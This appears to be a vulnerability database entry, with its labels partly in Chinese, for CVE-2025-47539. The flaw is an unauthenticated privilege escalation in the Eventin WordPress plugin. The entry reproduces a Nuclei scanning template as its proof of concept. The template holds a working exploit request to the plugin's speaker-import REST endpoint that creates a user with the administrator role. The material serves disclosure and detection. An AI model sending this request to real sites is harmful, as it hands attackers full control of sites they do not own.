CVE-2025-47539: Eventin <= 4.0.26 - Privilege Escalation

日期: 2025-08-01 | 影响软件: Eventin | POC: 已公开

漏洞描述

The Eventin WordPress plugin before 4.0.27 suffers from an unauthenticated privilege escalation vulnerability. Due to a missing permission check in the a REST API endpoint, unauthenticated attackers can import users with arbitrary roles, including administrator, leading to full site compromise.

PoC代码[已公开]

id: CVE-2025-47539

info:
  name: Eventin <= 4.0.26 - Privilege Escalation
  author: pdresearch
  severity: critical
  description: |
    The Eventin WordPress plugin before 4.0.27 suffers from an unauthenticated privilege escalation vulnerability. Due to a missing permission check in the a REST API endpoint, unauthenticated attackers can import users with arbitrary roles, including administrator, leading to full site compromise.
  reference:
    - https://patchstack.com/database/vulnerability/eventin/wordpress-eventin-plugin-4-0-26-unauthenticated-privilege-escalation-vulnerability
    - https://themewinter.com/eventin/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47539
  classification:
    epss-score: 0.14363
    epss-percentile: 0.94193
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47539
    cwe-id: CWE-269
  metadata:
    verified: true
    max-request: 1
    vendor: themewinter
    product: eventin
    fofa-query: body="/wp-content/plugins/eventin"
  tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,vkev

variables:
  name: "{{randbase(5)}}"
  oast: "oast.fun"

http:
  - raw:
      - |
        POST /wp-json/eventin/v2/speakers/import?_locale=user HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS5Gx6VCxm3HMV2A9

        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9
        Content-Disposition: form-data; name="speaker_import"; filename="speakers.json"
        Content-Type: application/json

        [
          {
            "id": "999",
            "name": "{{name}}",
            "email": "{{name}}@{{oast}}",
            "image": "",
            "designation": "test",
            "summary": "",
            "social": [
              []
            ],
            "company_logo": "",
            "company_url": "",
            "speaker_group": "",
            "speaker_category": [
              "speaker"
            ],
            "company_name": "",
            "author_url": "",
            "role": "administrator"
          }
        ]
        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9--

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Successfully imported speaker")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: dsl  # type of the extractor
        dsl:
          - '"Email: " + name + "@" + oast'  # the variable to extract
# digest: 490a004630440220226a0bab75d688ec26e701515fbc94d2b5a48f412625643863d05a6eddb3bd4102203547acb65a73ee8327d8fbf7fde6b2410037200875bf4f02fa7422813b99bc75:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-47539.yaml